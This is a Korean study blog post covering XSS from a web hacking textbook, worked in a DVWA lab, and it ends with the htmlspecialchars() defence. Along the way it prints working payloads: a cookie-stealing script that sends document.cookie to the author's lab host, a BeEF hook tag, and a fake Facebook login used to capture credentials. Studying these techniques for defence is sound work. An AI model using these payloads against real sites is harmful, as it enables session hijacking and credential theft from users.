Top

Chapter 09. XSS 공격

모의해킹/화이트해커 를 위한 웹 해킹의 기술

2022. 2. 26.

==================================================

!warning!

본 게시글은 본인의 학습기록을 위해 작성된 알려진 학습 기법

함부로 악의적으로 이용은 엄연히 불법 임으로

절대 시도하지 말 것이며

사고 발생 시 본인은 절대로 책임지지 않습니다!

==================================================

 

Chapter 09. XSS 공격

-서버의 취약점을 이용하여 자바스크립트로 클라이언트 공격을
의미합니다(ex:쿠키 탈취)

-삽입한 코드가 언제 실행되는지에 따라 reflected 공격과 stored
공격으로 구분 가능

리플렉티드 XSS 공격 개요-요청 메시지에 입력된 스크립트 코드가 즉시 응답 메시지를 토해 출력되는 취약점,
주로 게시판에 글을 남기거나 이메일 피싱을 이용하여 악의적인 스크립트 코드가 담긴
요청을 사용자가 실행하도록 만듭니다. 리플렉티드 XSS 공격 실습

스샷. 1

-빈칸에 입력된 이름이 바로 출력됨

1
<script>alert(1)</script>
cs

 

스샷. 2

– 웹 애플리케이션이 사용자가 입력한 값을 그대로 출력하는 경우 리플렉티드 XSS가
존재할 가능성이 놓습니다, 이를 테스트하기 위하여 스크립트 태그를 사용합니다.

1
<script>alert(document.cookie)</script>
cs

 

스샷. 3

-쿠키를 출력하는 자바스크립트

 

스샷. 4-5

-공격자의 웹 서버에 쿠키 값을 전달하기 위하여 웹 서버를 작동시킨 다음, 192.168으로 시작

하는 IP 주소 가 확인됩니다.

스샷. 6

-주소창에 IP 주소로 웹 서버가 잘 돌아가는지 확인해봅니다.

스샷. 7
-access.log에는 웹 서버로 들어곤 요청 정보가 기록되고, tail 명령어는
파일의 내용이 갱신되면새로 추가된 내용을 바로 출력해주는 명령어

1
<script>document.location=‘http://192.168.37.130/cookie?’+document.cookie</script>
cs

 

스샷. 8-9

– 리다이렉트된 URL이 공격자의 호스트에 존재하지 않기 때문에 에러 발생, 무시해도 되고
접근 로그에 GET /cookie? 문자열 이후 나오는 내용은 document cookie에 의해 출력된 쿠키 정보, PHPSESSIONID 쿠키 탈취 성공

BeEF 공격 프레임워크

스샷. 8-9

– BeEF는 브라우저 익스플로잇 프레임워크 프로그램으로,
~~사실상 해킹툴…~~후킹 코드를 사용자가 실행하면 그
사용자의 호스트를 대상으로 여러 가지 공격을 실행할 수 있도록 도움

스샷. 10

-웹 페이지가 자동으로 띄워짐, beef/beef로 로그인

스샷. 11

1
<script src=“http://127.0.0.1:3000/js”></script>
cs

 

-처음 실행될 때 확인한 후크 스크립트를 Vulnerability: Reflected Cross Site Scripting (XSS)
에 입력하시면

스샷. 12

– Pretty Theft 기능은 SNS 사이트의 인터페이스를 모방하여 사용자가
그 사이트의 아이디/패스워드를 입력하도록 유도

 

스샷. 14-15

-실행시키면 DVWA 사이트에 가짜 페이스북 인터페이가 출력됨

-로그인하면 그 데이터가 BeEF에 출력됩니다.

스토어드 XSS 공격 실습

 

스샷. 16-17

– 더 이상 입력이 안되 진행이 안된다면 Inspect Element 클릭하면 소스코드에서 maxlength가 50으로 설정되어 있으니까 원하는 값으로 바꿔 줍니다.

1
<script>document.location=’http://192.168.37.130/cookie?’+document.cookie</script>
cs

 

 

스샷. 18-19

-access.log 파일을 확인해보면 쿠키 정보가 담긴 요청 기록이 새롭게 생성되었습니다,
이후 방문자들 즉 타깃들은 모두 공격을 당하게 됩니다.

스토어드 XSS 공격 대응

스샷. 20

-htmlspecialchars() 함수는 특수문자들을 HTML 엔티티로 변환해주는 함수,
리플렉티드 XSS 공격 역시 이와 같은 방법으로 대응할 수 있습니다.

==================================

휴… 이제서야 챕터 9까지 작성했습니다 (´∀`;)

본인이 알기로는 이 실습·복습 책 이 챕터 18까지 인걸로

압니다 언제 다 작성될까요 ㅋㅋㅋㅋㅋㅋ… {ō xō};

~~압니다 언제 다 작성될까요 ㅋㅋㅋㅋㅋㅋ… {ō xō};~~

아무튼 긴 글을 읽어 주셔서 감사하고 남은 하루 잘 보내시고

좋은 하루 되시고 하시는 일 다 잘 되시고 코로나
조심하세요.(ㆁᴗㆁ✿)